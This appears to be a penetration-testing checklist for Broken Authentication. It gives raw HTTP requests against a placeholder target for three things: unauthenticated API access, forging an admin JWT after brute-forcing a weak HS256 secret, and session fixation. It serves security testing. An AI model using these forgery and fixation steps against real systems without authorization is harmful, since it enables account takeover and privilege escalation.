Broken Authentication

Check List

Do not authenticate to the application

Directly access a protected API endpoint

GET /api/user/profile HTTP/1.1
Host: target.com

If response returns user data without requiring Authorization header, authentication enforcement is missing

Test with random token

GET /api/user/profile HTTP/1.1
Host: target.com
Authorization: Bearer randomtoken123

If endpoint responds with valid user data or default user context, authentication validation is broken

If no 401/403 response is returned for unauthenticated access, Broken Authentication is confirmed

Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.payload.signature

Decode JWT payload, Identify algorithm

{"alg":"HS256"}

Attempt to brute-force weak secret using jwt tool

If secret is guessable ("secret", "123456"), generate new token with modified payload:

{"user":"admin","role":"admin"}

Sign token with discovered secret, Replace Authorization header

Authorization: Bearer forged_admin_token

Access privileged endpoint

GET /api/admin/dashboard HTTP/1.1
Host: target.com
Authorization: Bearer forged_admin_token

If access is granted, JWT authentication mechanism is broken

If server accepts forged token, Broken Authentication vulnerability is confirmed

Access login endpoint and intercept response

POST /api/login HTTP/1.1
Host: target.com
Content-Type: application/json

{"username":"user1","password":"Pass123"}

Observe returned session token

Set-Cookie: session=abc123; Path=/; HttpOnly

Before login, manually set session cookie

Cookie: session=fixedsession123

Perform login, If server reuses provided session ID after authentication

Set-Cookie: session=fixedsession123

Then session fixation is possible, Use fixed session in another browser

GET /api/user/profile HTTP/1.1
Host: target.com
Cookie: session=fixedsession123

If authenticated access is granted, session management is flawed

If session ID is not regenerated upon login, Broken Authentication vulnerability is confirmed

Last updated 1 month ago